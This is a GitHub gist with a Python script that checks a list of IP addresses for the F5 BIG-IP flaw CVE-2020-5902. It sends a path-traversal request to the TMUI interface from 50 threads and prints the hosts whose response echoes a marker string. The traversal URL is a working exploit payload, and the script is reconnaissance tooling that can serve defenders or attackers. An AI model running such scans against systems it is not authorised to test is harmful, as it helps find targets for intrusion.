Skip to content

Instantly share code, notes, and snippets.

@akhil-reni
Last active July 5, 2020 11:32
Show Gist options
  • Save akhil-reni/ae7d2322504cad35bc78af3edc8cf2a4 to your computer and use it in GitHub Desktop.
Save akhil-reni/ae7d2322504cad35bc78af3edc8cf2a4 to your computer and use it in GitHub Desktop.
Check CVE-2020-5902 on a list of IPs
import requests
import logging
from concurrent.futures import ThreadPoolExecutor
import asyncio
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
logger = logging.getLogger(__name__)
class TaskExecuter:
def __init__(self, threads):
self.pool = ThreadPoolExecutor(threads)
self.results = []
self.tasks = []
async def execute_task(self, func, **kwargs):
future = self.pool.submit(func, **kwargs)
awaitable = asyncio.wrap_future(future)
return await awaitable
def add_task(self, func):
self.tasks.append(func)
async def app(self):
result = await asyncio.gather(*self.tasks)
self.results.append(result)
task_obj = TaskExecuter(50)
def get_vulnerable(url):
r = requests.get(url, verify=False, allow_redirects=True)
if r.status_code == 200:
if "iamthereintheresponse" in r.text:
print(url)
return url
with open("ips.txt", "r") as f:
lines = f.read().splitlines()
for line in lines:
task_obj.add_task(task_obj.execute_task(get_vulnerable, url="https://"+line+"/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=iamthereintheresponse", ))
asyncio.run(task_obj.app())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment